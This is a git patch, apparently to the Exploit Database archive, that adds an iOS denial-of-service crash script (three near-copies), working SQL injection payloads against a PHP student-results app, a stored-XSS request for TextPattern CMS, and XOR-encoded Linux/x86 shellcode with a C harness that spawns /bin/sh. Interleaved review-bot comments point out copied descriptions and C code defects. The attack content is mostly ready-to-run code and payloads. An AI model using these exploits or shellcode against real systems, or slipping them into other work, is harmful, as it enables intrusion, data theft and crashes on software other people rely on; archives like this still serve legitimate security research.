From eaff7043e2c413df9b5f295777c64b46cd1145c0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 11 Jun 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-06-11
6 changes to exploits/shellcodes
Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
n+otes 1.6.2 - Denial of Service (PoC)
memono Notepad Version 4.2 - Denial of Service (PoC)
Student Result Management System 1.0 - 'class' SQL Injection
TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)
Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)
---
 exploits/ios/dos/49978.py | 35 +++++++
 exploits/ios/dos/49979.py | 35 +++++++
 exploits/ios/local/49977.py | 35 +++++++
 exploits/php/webapps/49974.txt | 30 ++++++
 exploits/php/webapps/49975.txt | 186 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 5 +
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86/49976.c | 74 +++++++++++++
 8 files changed, 401 insertions(+)
 create mode 100755 exploits/ios/dos/49978.py
 create mode 100755 exploits/ios/dos/49979.py
 create mode 100755 exploits/ios/local/49977.py
 create mode 100644 exploits/php/webapps/49974.txt
 create mode 100644 exploits/php/webapps/49975.txt
 create mode 100644 shellcodes/linux_x86/49976.c
diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py
new file mode 100755
index 000000000..ad51d7378
--- /dev/null
+++ b/exploits/ios/dos/49978.py
@@ -0,0 +1,35 @@
+# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
+# Date: 06-07-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608
+# Version: 3.0.6
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py
new file mode 100755
index 000000000..79a3e41b6
--- /dev/null
+++ b/exploits/ios/dos/49979.py
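Review bot: The description line `Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:` names an application other than the one in the title (Sticky Notes Widget Version 3.0.6), so it reads as text carried over from an earlier advisory; it should say `Sticky Notes Widget is vulnerable to a DoS condition when a long list of characters is being used when creating a note:`. The same copied sentence appears in exploits/ios/dos/49979.py (n+otes) and exploits/ios/local/49977.py (memono Notepad) in this commit. In the script itself the bare `except:` swallows every exception, including KeyboardInterrupt, and the message hides the real cause; `except OSError as e:` with the error included in the printed text, and `with open("payload.txt", "w") as f:` so the handle is closed on every path, would make the helper clearer. 49977.py is also labelled `Category: DoS (iOS)` in its header but filed under exploits/ios/local/ in the index, which is worth reconciling.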
@@ -0,0 +1,35 @@
+# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
+# Version: 1.6.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py
new file mode 100755
index 000000000..991b38e4e
--- /dev/null
+++ b/exploits/ios/local/49977.py
@@ -0,0 +1,35 @@
+# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
+# Version: 4.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/php/webapps/49974.txt b/exploits/php/webapps/49974.txt
new file mode 100644
index 000000000..e11e602fc
--- /dev/null
+++ b/exploits/php/webapps/49974.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection
+# Date: 09.09.2020
+# Exploit Author: Riadh Benlamine (rbn0x00)
+# Vendor Homepage : https://projectworlds.in
+# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
+# Version: 1.0
+# Category: Webapps
+# Tested on: Apache2+MariaDB latest version
+# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.
+
+The vulnerable parameter uri: /srms/student.php?class=
+
+exploit:
+
+ Parameter: class (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+ Payload: class=-6346' OR 3657=3657#&rn=1
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1
+
+ Type: UNION query
+ Title: MySQL UNION query (random number) - 7 columns
+ Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1
\ No newline at end of file
diff --git a/exploits/php/webapps/49975.txt b/exploits/php/webapps/49975.txt
new file mode 100644
index 000000000..3b8fc9934
--- /dev/null
+++ b/exploits/php/webapps/49975.txt
@@ -0,0 +1,186 @@
+# Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)
+# Date: 2021/09/06
+# Exploit Author: Mert Daş merterpreter@gmail.com
+# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web: https://textpattern.com/
+# Tested on: Server: Xampp
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TextPattern 4.8.7 is vulnerable; other versions may also be affected.
+
+Header
+
+-POST /textpattern/textpattern/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973
+Content-Length: 4574
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27
+Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="ID"
+
+2
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="event"
+
+article
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="step"
+
+edit
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sPosted"
+
+1623260284
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sLastMod"
+
+1623260295
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="AuthorID"
+
+admin
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="LastModID"
+
+admin
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Title"
+
+">
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Body"
+
+">
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="textile_excerpt"
+
+1
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Excerpt"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Status"
+
+4
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Section"
+
+articles
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="override_form"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="year"
+
+2021
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="month"
+
+06
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="day"
+
+09
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="hour"
+
+19
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="minute"
+
+38
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="second"
+
+04
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_year"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_month"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_day"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_hour"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_minute"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_second"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sExpires"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Category1"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Category2"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="url_title"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Keywords"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Image"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="custom_1"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="custom_2"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="app_mode"
+
+async
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="_txp_token"
+
+346eeab2db04acf953d13529f6be3a74
+-----------------------------1356274838636633083297009973--
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 238bda902..d5152a42c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6796,6 +6796,8 @@ id,file,description,date,author,type,platform,port
 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios,
 49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
+49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
+49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11355,6 +11357,7 @@ id,file,description,date,author,type,platform,port
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
+49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44129,3 +44132,5 @@ id,file,description,date,author,type,platform,port
 49971,exploits/php/webapps/49971.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2021-06-09,"Mert Daş",webapps,php,
 49972,exploits/php/webapps/49972.txt,"WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)",2021-06-09,"Mesut Cetin",webapps,php,
 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,
+49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,
+49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index acc8e60bb..b976354ed 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1037,3 +1037,4 @@ id,file,description,date,author,type,platform
 49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86
+49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/49976.c b/shellcodes/linux_x86/49976.c
new file mode 100644
index 000000000..6033679bd
--- /dev/null
+++ b/shellcodes/linux_x86/49976.c
@@ -0,0 +1,74 @@
+# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
+# Date: 09/06/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+ shellcode with XOR decoder stub and fstenv MMX FPU
+ spawning a /bin/sh shell
+
+ uses the fstenv GetPC technique to get the memory address dynamically
+ (alternative to jmp-call-pop)
+
+ Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
+ ./mmx-xor-decoder_eip
+ Shellcode Length: 70
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # ps -p $$
+ PID TTY TIME CMD
+ 24045 pts/4 00:00:00 sh
+
+ *** Created by d7x
+ https://d7x.promiselabs.net
+ https://www.promiselabs.net ***
+***/
+
+/***
+; shellcode assembly
+
+global _start
+
+section .text
+_start:
+ fldz
+ fstenv [esp-0xc]
+ pop edi ; put eip into edi
+ add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)
+
+ lea esi, [edi + 8]
+ xor ecx, ecx
+ mov cl, 4
+
+decode:
+ movq mm0, qword [edi]
+ movq mm1, qword [esi]
+ pxor mm0, mm1
+ movq qword [esi], mm0
+ add esi, 0x8
+ loop decode
+
+ jmp short EncodedShellcode
+
+shellcode:
+
+ decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
+ EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d
+
+***/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
+
+void main(void)
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int(*ret)() = (int(*)())shellcode;
+
+ ret();
+
+}
\ No newline at end of file
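Review bot: `void main(void)` in the new shellcodes/linux_x86/49976.c is not a conforming signature for a hosted C program, and `printf("Shellcode Length: %d\n", strlen(shellcode));` passes a `size_t` to `%d`, which is undefined behaviour and is flagged by -Wformat; the harness should read `int main(void)`, end with `return 0;`, and print with `printf("Shellcode Length: %zu\n", strlen(shellcode));`. The two `#include` lines in the hunk carry no header name — presumably `<stdio.h>` and `<string.h>` were lost when the page was rendered, but as shown the file does not compile. The leading `# Exploit Title:` / `# Date:` / `# Exploit Author:` / `# Tested on:` lines sit outside any comment, so a C compiler rejects them as invalid preprocessing directives unless they are moved inside a `/* ... */` block like the two that follow. Reporting the length as `sizeof shellcode - 1` rather than `strlen(shellcode)` would also keep the printed figure correct if a later re-encoding ever produced a NUL byte in the array.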